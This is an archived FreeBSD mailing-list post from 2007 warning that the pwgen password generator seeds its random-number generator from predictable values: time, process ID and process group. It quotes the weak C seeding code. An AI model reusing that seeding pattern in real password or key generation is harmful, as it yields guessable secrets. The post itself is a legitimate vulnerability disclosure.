From owner-freebsd-questions@FreeBSD.ORG Mon Jan 8 18:25:38 2007 Return-Path: X-Original-To: questions@freebsd.org Delivered-To: freebsd-questions@FreeBSD.ORG Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 75C0216A403 for ; Mon, 8 Jan 2007 18:25:38 +0000 (UTC) (envelope-from fbsd06@mlists.homeunix.com) Received: from turtle-out.mxes.net (turtle-out.mxes.net [216.86.168.191]) by mx1.freebsd.org (Postfix) with ESMTP id 5021F13C44C for ; Mon, 8 Jan 2007 18:25:38 +0000 (UTC) (envelope-from fbsd06@mlists.homeunix.com) Received: from mxout-03.mxes.net (mxout-03.mxes.net [216.86.168.178]) by turtle-in.mxes.net (Postfix) with ESMTP id 2781710516 for ; Mon, 8 Jan 2007 12:53:18 -0500 (EST) Received: from gumby.homeunix.com (unknown [87.81.140.128]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by smtp.mxes.net (Postfix) with ESMTP id A76485199A; Mon, 8 Jan 2007 12:53:16 -0500 (EST) Date: Mon, 8 Jan 2007 17:53:14 +0000 From: RW To: questions@freebsd.org, oddbjorn@tricknology.org Message-ID: <20070108175314.27ce391f@gumby.homeunix.com> X-Mailer: Sylpheed-Claws 2.6.0 (GTK+ 2.10.6; i386-portbld-freebsd6.1) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Cc: Subject: pwgen's seeding looks insecure X-BeenThere: freebsd-questions@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: User questions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 08 Jan 2007 18:25:38 -0000 Someone recently recommended sysutils/pwgen for generating user passwords. Out of curiosity I had a look at how it works, and I don't like the look of its PRNG initialization: #ifdef RAND48 srand48((time(0)<<9) ^ (getpgrp()<<15) ^ (getpid()) ^ (time(0)>>11)); #else srand(time(0) ^ (getpgrp() << 8) + getpid()); #endif If pwgen is called from an account creation script, time(0) can be inferred from timestamps, e.g. on a home-directory, so that just leaves getpid() and getpgrp(). PIDs are allocated sequentially and globally, so getpid() is highly predictable. I don't know much about getpgrp(), but from the manpage it doesn't appear to be any better. Unless getpgrp() is a better source of entropy than I give it credit for, I think this port should perhaps be marked as vulnerable.